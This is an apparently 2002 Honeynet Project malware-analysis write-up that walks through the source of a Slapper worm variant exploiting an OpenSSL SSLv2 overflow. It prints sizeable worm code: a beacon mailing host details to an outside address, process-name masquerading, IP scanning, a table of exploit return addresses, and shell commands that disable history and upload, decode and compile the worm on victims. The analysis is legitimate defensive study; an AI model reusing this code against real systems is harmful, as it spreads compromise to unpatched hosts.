<?xml version="1.0"?>
<!DOCTYPE article PUBLIC  "-//OASIS//DTD DocBook XML V4.1.2//EN"
    "http://docbook.org/xml/4.1.2/docbookx.dtd">

  <article>
  <articleinfo>
    <title>Honeynet Project Scan of the Month - Scan 25 (November 2002)</title>

    <author>
      <firstname>Eloy</firstname>
      <surname>Paris</surname>
      <affiliation>
	<address>
	  <email>peloy at chapus dot net</email>
	</address>
      </affiliation>
    </author>

    <abstract>
      <para>
	The Honeynet Project's
	<ulink url="http://www.honeynet.org/scans/scan25/">
	  Scan of the Month for November 2002</ulink> requires the
	analysis of a file obtained from a compromised honeypot. The
	file turns out to be a gzip-compressed GNU tar archive that
	contains two C source files. I found out that these files
	contain the source code for a variant of the Slapper worm that
	hit the Internet on September 13, 2002 and that exploited the
	OpenSSL SSLv2 malformed client key remote buffer overflow
	vulnerability. In this paper I examine how the worm operates,
	what its capabilities are, and how it propagates and infects
	other machines.
      </para>
    </abstract>

    <keywordset>
      <keyword>honeynet</keyword>
      <keyword>honeypot</keyword>
      <keyword>worm</keyword>
      <keyword>eloy paris</keyword>
      <keyword>linux</keyword>
      <keyword>slapper</keyword>
      <keyword>chapu</keyword>
      <keyword>apache</keyword>
      <keyword>openssl</keyword>
      <keyword>vulnerabilies</keyword>
      <keyword>script kiddie</keyword>
    </keywordset>
    
  </articleinfo>

  <!--  start  -->

  <sect1>
    <title>Introduction</title>

    <para>
      This is a submission to the <ulink
      url="http://www.honeynet.org">Honeynet Project</ulink> <ulink
      url="http://www.honeynet.org/scans/scan25/">November 2002 Scan
      of the Month</ulink>. Here I analyze a variant of the Slapper
      worm that hit the Net on September 13, 2002 and that exploited
      the OpenSSL SSLv2 malformed client key remote buffer overflow
      vulnerability.
    </para>

    <para>
      The analysis is in some parts very detailed. If you are a
      grader, have lots of submissions to read, and can't go over all
      the details, or are just a casual reader, feel free to go
      directly to <xref linkend="questions"/>, which contains the
      answers to all the questions of this challenge. The questions
      (and answers) provide a good summary of the must important
      aspects of the worm. However, just reading the answers is not
      the best way to understand some of the details nor the process I
      followed to analyze the worm, so I would encourage you to read
      the whole submission.
    </para>

  </sect1>

  <sect1 id="inspection">
    <title>Initial Inspection</title>

    <para>
      The first thing I need to do after downloading the only file
      (called <filename>.unlock</filename>) that the Honeynet Project has
      given us is to determine what type of file I am dealing
      with. The easiest way to do this is by running the Unix
      <command>file</command> command on it:
    </para>

    <para>
      <screen>
peloy@canaima:~$ file .unlock
.unlock: gzip compressed data, from Unix</screen>
    </para>

    <para>
      This tells me that the file was compressed using Lempel-Ziv
      coding (LZ77). Now I can re-run the <command>file</command>
      command but this time specifying the
      <option>-z</option> switch to try to look inside compressed file:
    </para>

    <para>
      <screen>
peloy@canaima:~$ file -z .unlock
.unlock: GNU tar archive (gzip compressed data, from Unix)</screen>
    </para>

    <para>
      The <command>file</command> command is telling me that the
      compressed file contains a GNU tar archive.
    </para>

    <para>
      Finally, to find out the date in which the
      <filename>.unlock</filename> file was generated (information
      we will need to answer one of the Scan of the Month questions)
      I can use the
      <command>ls</command> command. As we can see below, the 
      <filename>.unlock</filename> file was created
      on September 22, 2002 at 1:06 PM (we don't know the time zone).
    </para>

    <para>
      <screen>
peloy@canaima:~$ ls -l .unlock
-rw-r--r--    1 peloy    peloy       17973 2002-09-22 13:06 .unlock</screen>
    </para>

    <para>
      With this new information
      we can now decompress (<command>gzip</command>'s <option>-d</option>
      switch) the file to standard output (<command>gzip</command>'s
      <option>-c</option> switch) and pipe the output
      to the <command>tar</command> command. We use the <command>tar</command>
      command's <option>-t</option> switch to list the contents of the archive:
    </para>

    <para>
      <screen>
peloy@canaima:~$ gzip -dc .unlock | tar tvf -
-rw-r--r-- root/wheel    70981 2002-09-20 09:28:11 .unlock.c
-rw-r--r-- root/wheel     2792 2002-09-19 17:57:48 .update.c</screen>
    </para>

    <para>
      Bingo! Now we know that we might be dealing we two C source files, one
      called <filename>.unlock.c</filename> and the other one called
      <filename>.update.c</filename>. We can even see the dates these two
      files were last modified. To extract the contents of the archive we
      just need to run the <command>tar</command> command with the
      <option>-x</option> switch.
    </para>

  </sect1>

  <sect1 id="analysis">
    <title>Analysis</title>

    <para>
      Analysis of this month's Scan of the Month is a lot easier than
      analysis of previous Scans of the Month and Honeynet Project's
      Challenges like <ulink
	url="http://www.honeynet.org/challenges/scan22/">Scan 22</ulink>
      and the <ulink url="http://www.honeynet.org/reverse/">Reverse
	Challenge</ulink>. The reason it is easy to analyze this month's
      Scan of the Month is because we are getting the <emphasis>actual
	source code</emphasis> of the program we are concerned with. In
      the two other challenges I mentioned above, it was pretty hard to
      do the analysis because we were only given the binaries
      (executable files), so we needed to reconstruct symbol tables and
      decompile the programs. This took a considerable amount of time
      given that the process is highly manual and there are not good
      tools for reverse-engineering Unix binaries (save Dion Mendel's
      tools, which I use for Scan 22.)
    </para>

    <para>
      To analyze what the worm does, how it propagates to other
      machines, how it operates, what capabilities it offers, and
      other details, I will go over the worm's source code. The format
      I will use will present a source code segment with callouts to
      comments that follow the code and that explain different
      features of the code segment. The number right before the
      comment is a hypelink, and clicking on it will take you to the
      specific line the comment refers to.
    </para>

    <para>
      Just to provide a general idea or 20,000 feet view, the program
      structure is something like:
    </para>

    <programlisting>
main()
{
  initialize();

  while (1) {
     select(timeout=2secs);
     every_60secs_task;
     every_3secs_task;
     every_10mins_task;
     scan_and_infect();
     peer_to_peer_network_housekeeping;
     switch (command) {
        command 1:
          handle_command1;
          break;
        command 2:
          handle_command2;
        udp DoS:
          do_udp_flood;
        tcp DoS:
          do_tcp_flood;
        dns DoS:
          do_dns_flood;
        .
        .
        .
        etc.
     }
  }
}</programlisting>

    <para>
      I'll go over each one of these parts in the next sections.
    </para>

    <sect2 id="init">
      <title>Initialization</title>

      <programlisting>
1768 int main(int argc, char **argv) {
1769         unsigned char a=0,b=0,c=0,d=0;
1770         unsigned long bases,*cpbases;
1771         struct initsrv_rec initrec;
1772         int null=open("/dev/null",O_RDWR);
1773         uptime=time(NULL);
1774         if (argc &lt;= 1) { <co id="l1774"/>
1775                 printf("%s: Exec format error. Binary file not executable.\n",argv[0]);
1776                 return 0;
1777         }
1778         srand(time(NULL)^getpid());
1779         memset((char*)&amp;routes,0,sizeof(struct route_table)*24);
1780         memset(clients,0,sizeof(struct ainst)*CLIENTS*2);
1781         if (audp_listen(&amp;udpserver,PORT) != 0) { <co id="l1781"/>
1782                 printf("Error: %s\n",aerror(&amp;udpserver));
1783                 return 0;</programlisting>
      <calloutlist>
	<callout arearefs="l1774">
	  <para>
	    The first thing the worm does is to check the number of
	    arguments passed to it in the command line. The worm expects
	    at least one argument, so if it is called without arguments 
	    it prints a non-sense error message and exits (line 1776.)
	  </para>
	</callout>
	<callout arearefs="l1781">
	  <para>
	    The function <function>audp_listen()</function> is called
	    to create a socket and bind to UDP port 4156 (the
	    parameter PORT is a symbol defined
	    in line 66 as "4156".) The socket, the port number, and
	    other socket-related information is stored in the global
	    variable <varname>udpserver</varname>, which is declared
	    as <type>struct ainst</type>.
	  </para>
	</callout>
      </calloutlist>
      
      <para>
	In the lines following the call to the
	<function>audp_listen()</function> function (lines 1785 to
	1798) several structures used by the worm are initialized. One
	interesting structure that is initialized here is the array of
	IP addresses <varname>cpbases</varname>, which is initialized
	with the list of IP addresses that is passed to the worm on
	the command line:
      </para>

      <programlisting>
1789         cpbases=(unsigned long*)malloc(sizeof(unsigned long)*argc); <co id="l1789"/>
1790         if (cpbases == NULL) {
1791                 printf("Insufficient memory\n");
1792                 return 0;
1793         }
1794         for (bases=1;bases&lt;argc;bases++) {
1795                 cpbases[bases-1]=aresolve(argv[bases]); <co id="l1795"/>
1796                 relay(cpbases[bases-1],(char*)&amp;initrec,sizeof(struct initsrv_rec)); <co id="l1796"/>
1797         }</programlisting>
      <calloutlist>
	<callout arearefs="l1789">
	  <para>
	    The worm requests memory to store <varname>argc</varname>
	    IP addresses. If memory is not available the worm exists
	    printing the error message in line 1791.
	  </para>
	</callout>
	<callout arearefs="l1795">
	  <para>
	    This is were the <varname>cpbases</varname> array is
	    initialized. The function <function>aresolve()</function>
	    just resolves a host name and returns the corresponding IP
	    address.
	  </para>
	</callout>
	<callout arearefs="l1796">
	  <para>
	    The function <function>relay()</function> is called. It
	    is in this function that the worm generates its first network activity: the worm
	    sends to each IP address or host
	    name passed in the command line a packet that contains the
	    following data: {tag=0x70, len=0, id=0}. As we shall
	    see, this packet just announces the worm to other peers
	    in the network.
	    <function>relay()</function> calls
	    <function>lowsend()</function>, which in turn does the
	    actual send.
	  </para>
	</callout>
      </calloutlist>

      <para>
      </para>
	
      <programlisting>
1799         dup2(null,0); dup2(null,1); dup2(null,2); <co id="l1799"/>
1800         if (fork()) return 1;</programlisting>
      <calloutlist>
	<callout arearefs="l1799">
	  <para>Here the worm goes daemon. For this it duplicates the
	    file descriptor <varname>null</varname>, which is
	    associated with <filename>/dev/null</filename>, as file
	    descriptors 0, 1, and 2, which correspond to
	    standard input, standard output and standard error respectively.
	  </para>
	  <para>
	    Finally, in the next line (line 1800) the worm forks. If the fork is
	    successful the child continues to run and the parent exits with
	    a return code of 1. If the fork is not successful the worm
	    exits with a return code of 1 as well.
	  </para>
	</callout>
      </calloutlist>

      <para>
      </para>

      <programlisting>
1801 // aion
1802              mailme(argv[1]); zhdr(0); <co id="l1802"/>
1803         for(a=0;argv[0][a]!=0;a++) argv[0][a]=0; <co id="l1803"/>
1804         for(a=0;argv[1][a]!=0;a++) argv[1][a]=0; <co id="l1804"/>
1805         strcpy(argv[0],PSNAME); <co id="l1805"/>
1806
1807         a=classes[rand()%sizeof(classes)]; b=rand(); c=0; d=0; <co id="l1807"/>
1808         signal(SIGCHLD, nas); signal(SIGHUP, nas); <co id="l1808"/></programlisting>

      <calloutlist>
	<callout arearefs="l1802">
	  <para>
	    In line 1802 the worm calls the function
	    <function>mailme()</function>, which does the following:
	  </para>
	  
	  <orderedlist>
	    <listitem>
	      <para>Creates a temporary socket.</para>
	    </listitem>
	    <listitem>
	      <para>Uses this socket to establish a TCP connection with port
		25 (Simple Mail Transfer Protocol) of the host
		freemail.ukr.net</para>
	    </listitem>
	    <listitem>
	      <para>Uses this TCP connection to send mail to
		<email>aion@ukr.net</email>. The host name used in the
		HELO SMTP command is test, and the sender used in the
		MAIL FROM SMTP command is test@microsoft.com. The e-mail
		does not have any headers and the body contains the following
		three lines:</para>

	      <literallayout>
hostid:   (decimal number)
hostname: (string)
att_from: (string)
	      </literallayout>

	      <para>hostid and hostname are obtained via the
		<function>gethostid()</function> and
		<function>gethostname()</function> C library functions,
		and they refer to the host executing the worm. att_from
		is the only parameter passed to the <function>mailme()
		</function> function, and represents the first
		argument passed to the worm from the command like.
		This argument is an IP address.</para>
	    </listitem>
	    <listitem>
	      <para>After the e-mail is sent, the function destroys the
		socket, which closes the TCP connection.</para>
	    </listitem>
	  </orderedlist>

	</callout>
	<callout arearefs="l1803">
	  <para>
	    Line 1803 just wipes out the string pointed by argv[0], which
	    is the program name. The name is wiped out by writing zeroes
	    to each byte in the string.</para>
	</callout>
	<callout arearefs="l1804">
	  <para>
	    Line 1804 also wipes a string, but in this case the one pointed
	    by argv[1], which is the first parameter passed to the worm
	    when it was invoked.</para>
	</callout>
	<callout arearefs="l1805">
	  <para>
	    In line 1805 the worm tries to obfuscate the program name
	    by overwriting argv[0] with the string "httpd ". This way
	    an administrator running the <command>ps</command> would
	    think that a HTTP server process is running.</para>
	</callout>
	<callout arearefs="l1807">
	  <para>
	    As we will see later, the worm scans other networks to try
	    to find other vulnerable hosts to which it can spread. In
	    line 1807 the worm initializes the first two 16 bits of the
	    IP networks it will scan. It does this by choosing a random
	    number from the classes[] array for the first octect, and
	    by choosing a completely random value for the second octect.
	  </para>
	</callout>
	<callout arearefs="l1808">
	  <para>
	    Finally, in line 1808 the worm assigns the signal handler
	    <function>nas()</function> to signals SIGCHLD and SIGHUP.
	    <function>nas()</function> does not do anything so in fact
	    these two signals are ignored if they are received.
	  </para>
	</callout>
      </calloutlist>

      <para>Here ends the initialization section of the worm's
	code. In the next section I will go in detail over the main
	loop of the worm.</para>
      
    </sect2>

    <sect2><title>Main Loop</title>

      <para>
	The main loop begins in line 1809. It is a big "while" loop
	that never exits. The first thing the worm does inside the
	main loop is to set a file descriptor set (stored in the
	variable <varname>read</varname>, declared as
	<type>fd_set</type> inside the main loop) so several sockets
	can be monitored with the <function>select()</function>
	function call:
      </para>

      <programlisting>
1818                 FD_ZERO(&amp;read);
1819                 if (udpserver.sock > 0) FD_SET(udpserver.sock,&amp;read); <co id="l1819"/>
1820                 udpserver.len=0; <co id="l1820"/>
1821                 l=udpserver.sock; 
1822                 for (n=0;n&lt;(CLIENTS*2);n++) if (clients[n].sock > 0) { <co id="l1822"/>
1823                         FD_SET(clients[n].sock,&amp;read);
1824                         clients[n].len=0;
1825                         if (clients[n].sock > l) l=clients[n].sock;
1826                 }
1827                 memset((void*)&amp;tm,0,sizeof(struct timeval));
1828                 tm.tv_sec=2; <co id="l1828"/>
1829                 tm.tv_usec=0;
1830                 l=select(l+1,&amp;read,NULL,NULL,&amp;tm);</programlisting>
      <calloutlist>
	<callout arearefs="l1819">
	  <para>The main socket is added to the file descriptor set.
	  </para>
	</callout>
	<callout arearefs="l1820">
	  <para>
	    The number of bytes read is initialized to zero.
	  </para>
	</callout>
	<callout arearefs="l1822">
	  <para>
	    Same thing for the file descriptors associated with
	    other peers in the network: we add each peer's socket to
	    the set of file descriptors to watch and set the number
	    of bytes read to zero.
	  </para>
	</callout>
	<callout arearefs="l1828">
	  <para>
	    The worm wants to wait two seconds for a change in any of the
	    file descriptors <function>select()</function> is
	    watching. Here this timeout is configured.</para>
	</callout>
      </calloutlist>

      <para>After <function>select()</function> is called in line
	1830, the worm will execute three pieces of codes depending on
	whether specific time intervals have elapsed. The first piece
	of code is executed every 60 seconds, the second will be
	executed every 3 seconds, and the third every 10 minutes.
      </para>

      <para>The code that is executed every 60 seconds is the following:</para>

      <programlisting>
1849     timeout+=time(NULL)-start;
1850     if (timeout >= 60) {
1851       if (links == NULL || numlinks == 0) {
1852         memset((void*)&amp;initrec,0,sizeof(struct initsrv_rec));
1853         initrec.h.tag=0x70;
1854         initrec.h.len=0;
1855         initrec.h.id=0;
1856         for (i=0;i&lt;bases;i++) relay(cpbases[i],(char*)&amp;initrec,
                 sizeof(struct initsrv_rec)); <co id="l1856"/>
1857       }
1858       else if (!myip) {
1859         memset((void*)&amp;initrec,0,sizeof(struct initsrv_rec));
1860         initrec.h.tag=0x74;
1861         initrec.h.len=0;
1862         initrec.h.id=0;
1863         segment(2,(char*)&amp;initrec,sizeof(struct initsrv_rec)); <co id="l1863"/>
1864       }
1865       timeout=0;
1866     }</programlisting>
      <calloutlist>
	<callout arearefs="l1856">
	  <para>If the worm does not know of other peers in the
	    network (that is, if the variable <varname>links</varname>
	    is NULL or if the variable <varname>numlinks</varname> is
	    0) the worm will do the same thing it did in line 1796
	    (see <xref linkend="init"/> above), which is to send a
	    packet with the data {tag=0x70, id=0, len=0} to another IP
	    in the virtual network.
	  </para>

	  <para>
	    Note that there is an off-by-one bug in this loop: the
	    array <varname>cpbases[]</varname> was initialized with
	    <varname>argc</varname> elements, but the loop runs from 1
	    to <varname>argc + 1</varname> (<varname>bases</varname>
	    equal <varname>argc + 1</varname> because of a previous
	    operation.) The result is that there is one extra UDP
	    packet that is sent, but since it goes to 0.0.0.0 it ends
	    up going to the local machine.
	  </para>
	</callout>
	<callout arearefs="l1863">
	  <para>
	     If the worm does not know of other peers in the network
	    and will if the worm knows its IP address (variable
	    <varname>myip</varname> is not zero) the worm send a packet
	    with the data {tag=0x74, id=0, len=0}.
	  </para>
	</callout>
      </calloutlist>

      <para>The code that is executed every 3 seconds (lines 1869 to
      1893) handles the sending of messages in the message queue. This
      is because the worm maintains a queue of messages to send to
      other peers it knows about. In some cases the worm just sends
      the messages immediately but in others messages are just queued
      for later transmission.</para>

      <para>The code that is executed every 6 seconds (lines 1896 to
      1900) just sends information about the peer-to-peer network of
      infected machines from the point of view of the sending machine
      to a random peer. The work is done by the function
      <function>broadcast()</function></para>

      <para>In lines 1903 and 1905, the worm just checks if any of the
      sockets <function>select()</function> is watching has any data,
      i.e. if data has been received. If there is data these two lines
      just set the <varname>len</varname> of the structures the worm
      uses to keep track of connection state to
      <varname>AREAD</varname>.</para>

      <para>Next, in line 1907, and extending to line 1938, the worm
      searches for remote machines it can infect. I go into the
      details of how the worm does this in <xref
      linkend="propagation"/>.</para>

      <para>After worm propagation has been taken care of, the worm
      seem to do some housekeeping tasks related to the peer-to-peer
      network. There can be up to 128 peers the worm is in touch with,
      and from line 1939 to line 2006, the worm performs tasks like
      adding and deleting peers to and from the internal list that
      keeps track of all connections. This list is stored in the array
      <varname>clients</varname>. I must confess that due to lack of
      time I did not go into the details of how the peer-to-peer
      network capabilities of the worm work.</para>

      <para>Finally, in line 2008 the last logical section of the main
      loop is started. This last section will read any command read
      from UDP port 4156, and process it. One of the features of the
      worm is that it provides backdoor capabilities that support a
      variety of tasks. For example, people that know that the worm is
      executing on a specific machine can request the machine to
      launch UDP, TCP or DNS Denial of Service attacks against any
      specific host, can request that the worm runs a command on the
      infected machine, that the worm scans all files in the infected
      machine and send back a list of all e-mail addresses found,
      etc.</para>

      <para><xref linkend="commands"/> contains a list of the commands
      the worm understands.</para>

    </sect2>

    <sect2 id="propagation">
      <title>Worm Propagation</title>

      <para>
	There are three aspects to the propagation of the worm to
	other machines: 1) search of remote machines to exploit
	(scanning of remote machines), 2) exploitation of a known
	vulnerability to get access to the remote host, and 3)
	replication of the worm to successfully compromised remote
	machines. I will go over each one of these aspects in the
	following sections.
      </para>

      <sect3>
	<title>The Quest for Vulnerable Hosts</title>

	<para>
	  As we shall see, the way the worm scans for other vulnerable
	  hosts is simple. The code that scans remote hosts the worm
	  can exploit begins in line 1907 and extends until line 1938.
	  Here's what the scanning code does:
	</para>

	<programlisting>
1907 #ifdef SCAN <co id="l1907"/>
1908     if (myip) for (n=CLIENTS,p=0;n&lt;(CLIENTS*2) &amp;&amp; p&lt;100;n++)
                if (clients[n].sock == 0) { <co id="l1908"/>
1909       char srv[256];
1910       if (d == 255) { <co id="l1910"/>
1911         if (c == 255) {
1912           a=classes[rand()%(sizeof classes)];
1913           b=rand();
1914           c=0;
1915         }
1916         else c++;
1917         d=0;
1918       }
1919       else d++;
1920       memset(srv,0,256);
1921       sprintf(srv,"%d.%d.%d.%d",a,b,c,d);
1922       clients[n].ext=time(NULL);
1923       atcp_sync_connect(&amp;clients[n],srv,SCANPORT);
1924       p++;
1925     }
1926     for (n=CLIENTS;n&lt;(CLIENTS*2);n++) if (clients[n].sock != 0) { <co id="l1926"/>
1927       p=atcp_sync_check(&amp;clients[n]);
1928       if (p == ASUCCESS || p == ACONNECT || time(NULL)-((unsigned long)clients[n].ext) >= 5)
                atcp_close(&amp;clients[n]); <co id="l1928"/>
1929       if (p == ASUCCESS) { <co id="l1929"/>
1930         char srv[256];
1931         conv(srv,256,clients[n].in.sin_addr.s_addr);
1932         if (mfork() == 0) {
1933           exploit(srv);
1934           exit(0);
1935         }
1936       }
1937     }
1938 #endif</programlisting>
	<calloutlist>
	  <callout arearefs="l1907">
	    <para>
	      All the scanning code is enclosed by a "#ifdef SCAN"
	      construct. My guess is that this was put in place by the
	      author of the worm to make debugging and testing
	      easier. The symbol <varname>SCAN</varname> is obviously
	      defined (in line 59.)
	      </para></callout>

	  <callout arearefs="l1908">
	    <para> The worm will scan consecutive IP addresses. The
	      first IP address will have the form
	      <varname>a.b.c.d</varname>, where <varname>a</varname>
	      will be initially randomly set to one value from an
	      array of pre-defined IP networks to scan (see line 291
	      for the actual declaration of the
	      <varname>classes[]</varname> array),
	      <varname>b</varname> will be set to a random value, and
	      <varname>c</varname> and <varname>d</varname> will be
	      set to zero.
	  </para>

	  <para>
	    After initializing <varname>a.b.c.d</varname> as I just
	    described, the worm will create chunks of 100 TCP sockets
	    and <varname>sockaddr</varname> structures. Each
	    <varname>sockaddr</varname> structure will have the
	    destination IP address set to <varname>a.b.c.d</varname>
	    and the port number set to 80. The creation of the sockets
	    and the initialization of the <varname>sockaddr</varname>
	    structures is actually done by the
	    <function>atcp_sync_connect()</function> in line 1923.
	  </para></callout>

	<callout arearefs="l1910"><para>
	    The way the <varname>a.b.c.d</varname> changes is as follows:
	    if both <varname>c</varname> and <varname>d</varname>
	    are equal to 255 it will reinitialize
	    <varname>a.b.c.d</varname> as I described above. If only
	    <varname>d</varname> is 255 then it will increment
	    <varname>c</varname>. If neither <varname>c</varname> nor
	    <varname>d</varname> is 255 then it will just increment
	    <varname>d</varname>.
	  </para></callout>

	<callout arearefs="l1926">
	    <para>
	      Once 100 sockets and <varname>sockaddr</varname> have
	      been created/initialized, the worm proceeds to check if
	      the has open the port <varname>SCANPORT</varname>, where
	      <varname>SCANPORT</varname> is a symbol defined in line
	      67 as 80, the Hyper Text Transfer Protocol (HTTP)
	      port. The function that is called to determine if port
	      80 of the remote hosts is open is called
	      <function>atcp_sync_check()</function>. This function
	      just calls the standard sockets API function
	      <function>connect()</function>. The parameters to the
	      <function>connect()</function> call are extracted from
	      the previously created sockets and sockaddr structures.
	    </para>
	  </callout>

	  <callout arearefs="l1928">
	    <para>
	      If it was possible to establish a TCP connection with
	      port 80 of the remote host, the TCP connection is closed
	      by calling the function
	      <function>atcp_close()</function>. This is not
	      efficient at all since later on the worm will reconnect
	      to try to exploit the remote host.
	    </para>
	  </callout>

	  <callout arearefs="l1929">
	    <para>
	      If a specific host is found to have port 80 open, then
	      an exploitation attempt is launched. Before launching an
	      attack the worm forks another instance. This instance
	      performs the attack, handles propagation of the worm if
	      the attack is successful, and then exits. I'll explain
	      the <function>exploit()</function> function below.
	    </para>
	  </callout>
	</calloutlist>

      </sect3>

      <sect3 id="exploit">
	<title>Penetrating Vulnerable Hosts</title>

	<para>
	  The function <function>exploit()</function> is very
	  important because that is the one that launches an
	  exploitation attempt, and spreads the worm if the attack is
	  launched and is successful. The function begins in line 1697.
	  Let's see what this function does (I'll just include the
	  most important parts of it):
	</para>

	<programlisting>
1697 void exploit(char *ip) {
1698   int port = 443;
1699   int i;
1700   int arch=-1;
1701   int N = 20;
1702   ssl_conn* ssl1;
1703   ssl_conn* ssl2;
1704   char *a;
1705
1706   alarm(3600);
1707   if ((a=GetAddress(ip)) == NULL) exit(0); <co id="l1707"/>
1708   if (strncmp(a,"Apache",6)) exit(0); <co id="l1708"/>
1709   for (i=0;i&lt;MAX_ARCH;i++) { <co id="l1709"/>
1710     if (strstr(a,architectures[i].apache) &amp;&amp; strstr(a,architectures[i].os)) {
1711       arch=i;
1712       break;
1713     }
1714   }
1715   if (arch == -1) arch=9; <co id="l1715"/>
1716
1717   srand(0x31337);
1718
1719   for (i=0; i&lt;N; i++) { <co id="l1719"/>
1720     connect_host(ip, port);
1721     usleep(100000);
1722   }
1723
1724   ssl1 = ssl_connect_host(ip, port); <co id="l1724"/>
1725   ssl2 = ssl_connect_host(ip, port);
1726
[...]
1751
1752   send_client_finished(ssl2);
1753   get_server_error(ssl2);
1754
1755   sh(ssl2->sock); <co id="l1755"/>
1756
1757   close(ssl2->sock);
1758   close(ssl1->sock);
1759
1760   exit(0);
1761 }</programlisting>
	<calloutlist>
	  <callout arearefs="l1707">
	    <para>
	      The first thing <function>exploit()</function> does
	      is to call the <function>GetAddress()</function>
	      function. <function>GetAddress()</function> in turns
	      establishes a TCP connection with port 80 of the remote
	      host. Once the connection is established, it sends the
	      bogus string "GET / HTTP/1.1\r\n\r\n". It is bogus
	      because it should not send a second "\r\n" pair since
	      HTTP version 1.1 requires sending "Host: &lt;hostname>"
	      after the "GET" request. But this doesn't matter because
	      the end goal is to make the remote web server spit an
	      error message that can be used to identify
	      <emphasis>what the web server software is</emphasis>!!!.
	    </para>

	    <para>
	      When the remote web server spits the error message,
	      <function>GetAddress()</function> will look for the
	      string "Server: xxxx", and return a pointer to
	      "xxxx". The idea is that <function>exploit()</function>
	      will then decide, based on whether the remote web server
	      is <emphasis>Apache</emphasis>, if it will launch the
	      exploitation attempt. An example of what a remote web
	      server running Apache would return is:
	    </para>

	    <screen>
peloy@canaima:~$ nc localhost 80
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Wed, 27 Nov 2002 05:21:56 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1</screen>
	  </callout>

	  <callout arearefs="l1708">
	    <para>
	      If the remote host <emphasis>is not running</emphasis>
	      Apache, the the worm gives up and exits (but remember
	      that this is a forked process, and the parent is still
	      running and scanning other hosts.)
	    </para>
	  </callout>

	  <callout arearefs="l1709">
	    <para>
	      Here the worm is trying to maximize its chances of
	      success by determining what specific version of Apache,
	      and what Linux distribution, are running on the remote
	      host. By identifying precisely these two the worm can
	      tune one exploit-specific parameter that will improve
	      the chances of success. The different "architectures"
	      the worm knows about are stored in the
	      <varname>architectures[]</varname> array. There are 23
	      different combinations of Linux distributions and Apache
	      versions. The Linux distributions are Gentoo, Debian,
	      RedHat, SuSE, Mandrake, and Slackware. Apache versions
	      range from 1.3.6 to 1.3.26. The actual list of
	      architectures is:
	    </para>

	    <programlisting>
   1239 #define MAX_ARCH 21
   1240
   1241 struct archs {
   1242         char *os;
   1243         char *apache;
   1244         int func_addr;
   1245 } architectures[] = {
   1246         {"Gentoo", "", 0x08086c34},
   1247         {"Debian", "1.3.26", 0x080863cc},
   1248         {"Red-Hat", "1.3.6", 0x080707ec},
   1249         {"Red-Hat", "1.3.9", 0x0808ccc4},
   1250         {"Red-Hat", "1.3.12", 0x0808f614},
   1251         {"Red-Hat", "1.3.12", 0x0809251c},
   1252         {"Red-Hat", "1.3.19", 0x0809af8c},
   1253         {"Red-Hat", "1.3.20", 0x080994d4},
   1254         {"Red-Hat", "1.3.26", 0x08161c14},
   1255         {"Red-Hat", "1.3.23", 0x0808528c},
   1256         {"Red-Hat", "1.3.22", 0x0808400c},
   1257         {"SuSE", "1.3.12", 0x0809f54c},
   1258         {"SuSE", "1.3.17", 0x08099984},
   1259         {"SuSE", "1.3.19", 0x08099ec8},
   1260         {"SuSE", "1.3.20", 0x08099da8},
   1261         {"SuSE", "1.3.23", 0x08086168},
   1262         {"SuSE", "1.3.23", 0x080861c8},
   1263         {"Mandrake", "1.3.14", 0x0809d6c4},
   1264         {"Mandrake", "1.3.19", 0x0809ea98},
   1265         {"Mandrake", "1.3.20", 0x0809e97c},
   1266         {"Mandrake", "1.3.23", 0x08086580},
   1267         {"Slackware", "1.3.26", 0x083d37fc},
   1268         {"Slackware", "1.3.26",0x080b2100}
   1269 };</programlisting>

	  </callout>

	  <callout arearefs="l1715">
	    <para>
	      Notice here that if the worm can accurately identify a
	      specific architecture, it defaults to the 9th entry in
	      the <varname>architectures</varname> array, which is
	      RedHat and Apache 1.3.23.
	    </para>
	  </callout>

	  <callout arearefs="l1719">
	    <para>
	      Here the worm is getting into exploit-specific
	      territory: the worm exploits the vulnerability of
	      OpenSSL that was announced by the <ulink
	      url="http://www.cert.org/advisories/CA-2002-23.html">CERT/CC</ulink>
	      on July 30, 2002 (see the references in <xref
	      linkend="refs"/> for links to online documents that
	      contain more details). So, the worm needs to
	      connect to port 443 (HTTPS) to be able to exploit the
	      vulnerability. What the worm is doing here is attempting
	      to open a connection to port 443 of the remote host. It
	      will retry 20 times, at 100 milliseconds between
	      retries. Inside the function
	      <function>connect_host()</function> we can see that if
	      the connection fails, the worm will exit.
	    </para>
	  </callout>

	  <callout arearefs="l1724">
	    <para>
	      Between lines 1724 and 1753 is where the actual
	      exploitation of the OpenSSL vulnerability takes place. I
	      won't go in details here because this is better
	      explained elsewhere (again, please refer to <xref
	      linkend="refs"/> for links to online documents that explain
	      well the details of this vulnerability.)
	    </para>
	  </callout>

	  <callout arearefs="l1755">
	    <para>
	      Finally, here the remote host has been compromised! The
	      worm is in and now is time to perpetuate the species!!!
	      The function <function>sh()</function> is the
	      responsible of propagating the worm to the compromised
	      machine. I will explain what this function does in the
	      next section.
	    </para>
	  </callout>
	</calloutlist>

      </sect3>

      <sect3 id="owned">
	<title>"You're mine!" a.k.a "You're 0wn3d!" a.k.a "Take this for not
	patching your machines!"</title>

	<para>
	  Once a vulnerable host has been successfully compromised it
	  is time for the worm to preserve the species. Worm
	  propagation is done by the <function>sh()</function>
	  function, which is called after the OpenSSH attack has been
	  successful. At this point, the worm has an open shell in the
	  remote host, and is ready to start sending the commands that
	  will propagate the worm. Let's see what it does in detail:
	</para>

	<programlisting>
1403 int sh(int sockfd) {
1404   char localip[256], rcv[1024];
1405   fd_set rset;
1406   int maxfd, n;
1407
1408   alarm(3600);
1409   conv(localip,256,myip); memset(rcv,0,1024);^M
1410 // aion
1411   writem(sockfd,"export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null;"
1412     "export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;"
1413     "exec bash -i\n");
1414   writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
1415                 "       /tmp/httpd /tmp/update /tmp/.unlock;\n"); <co id="l1415"/>
1416   writem(sockfd,"cat > /tmp/.unlock.uu &amp;&amp; __eof__; \n"); <co id="l1416"/>
1417   zhdr(1);
1418   encode(sockfd); <co id="l1418"/>
1419   zhdr(0);  
1420   writem(sockfd,"__eof__\n"); <co id="l1420"/>
1421   writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
1422                 "tar xzf /tmp/.unlock -C /tmp/;              "
1423     "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "
